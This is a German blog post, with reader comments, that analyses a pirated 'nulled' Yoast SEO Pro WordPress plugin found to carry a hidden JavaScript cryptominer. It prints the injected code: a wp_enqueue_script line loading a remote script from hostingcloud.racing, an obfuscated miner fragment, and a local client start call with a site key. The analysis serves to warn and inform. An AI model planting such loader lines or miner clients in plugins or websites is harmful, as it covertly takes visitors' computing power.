Cryptominer in Yoast Pro WordPress Plugin gefunden

Um es gleich vorwegzunehmen, es handelt sich um das „Yoast SEO Pro WordPress Plugin v11.3 NULLED“ welches seit 25.6.2019 auf Piratebay als Torrent heruntergeladen werden kann.

Diese Tatsache führt mich gleich zu Beginn zu folgendem wichtigen Hinweis:

Niemals gestohlene Software verwenden und schon gar nicht in Livesystemen.

Das Finden der Malware in diesem WordPress Plugin war ziemlich einfach, da bereits Avira in der aktuellen Version aufschrie.

Worum handelt es sich?

Es handelt sich bei dem Ordnerinhalt durchaus um das besagte Plugin. Auch die Pro-Features dürften problemlos funktionieren.

Zusätzlich hat der Inverkehrbringer einen JavaScript-Cryptominer in das Plugin integriert, welches im Browser bei jedem Websitebesucher ausgeführt wird.

Funktionsweise

Mit wp_enqueue_script wird zuerst eine Datei von www.hostingcloud.racing geladen, welche den JavaScript-Cryptominer enthält.

wp_enqueue_script( 'wp-internal', 'https://www.hostingcloud.racing/08GN.js', false, false, true );

Gekürzter Dateiinhalt. Minified und obfuscated.

var a=['TMOWwoTCh8Oi','w7pAccKqwo4=','aMK4VwPDghfDgFzDuA==','E8O/M8KRTnJB','AMOQw50Cw4kHwro=','L8KKYSs4ShXDuA==','QEfDuTFONsK7wql6','I0rCiGxubXrCrMOEwrg=','FcO6HyRwKMKcwoE=','w6PDpcOrwoAUw4UsJ3LCt8OS','FT

Mit einer weiteren wp_enqueue-Funktion wird ein lokaler Authentifizierungspart geladen, welche sich in der Datei /assets/js/wp-core.js befindet. Dort ist nur hinterlegt für welchen Account die wertvollen Crypowährungen (Bitcoin, Litecoin, Ether, …) geschürft werden.

wp_enqueue_script( 'wp-backend', plugins_url() . '/wordpress-seo-premium/assets/js/wp-core.js', false, false, true );

Dateiinhalt

var _client = new Client.Anonymous('f0e4d39d281f1c25a988f96cce62f81266ce7463ba93e61e7121297700b6599a', {
        throttle: 0.8, ads: 0
    });
    _client.start();

Sei sozial und teile

Über den Autor Andreas Grundner

Ich arbeite als Wordpress-, Joomla-, Typo3-, Magento-Integrator, Rootserver-Administrator und Webanwendungsprogrammierer. Meine Verpflichtung gilt dem Datenschutz, meine Leidenschaft dem Finden und Aufzeigen von Sicherheitslücken in Webanwendungen.

3 Reaktionen zu Cryptominer in Yoast Pro WordPress Plugin gefunden

  1. Wolfgang Jagsch
    08.08.2019 at 10:41 · Antworten

    Danke für die Insights. Man(n) lernt nie aus. Weiter so bitte. Read you soon.
    lg aus Linz
    wolfi

  2. Niels
    07.08.2019 at 16:21 · Antworten

    Ups, ja nulled Software sollte man sich nie laden. Da ist das Risiko groß! Hatte ich selbst schon, manchmal sind die Plugins und Softwares absolut verseucht damit. Original kaufen und man tut dem Entwickler damit auch was Gutes:) LG

    • Andreas
      05.09.2019 at 19:12 ·

      Hallo! Ich hab mir erlaubt einen Revisit Ihrer Seite abzustatten. Ein wahres Opt-In-Monster haben Sie da. Für meinen Geschmack etwas zu spammy. Auf der Startseite und bei der Anmeldung kommt nirgends rüber ob dein Angebot mit Kosten verbunden ist. Ich hab mich nicht getraut meine E-Mail-Adresse zu bestätigen!

Meinung sagen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.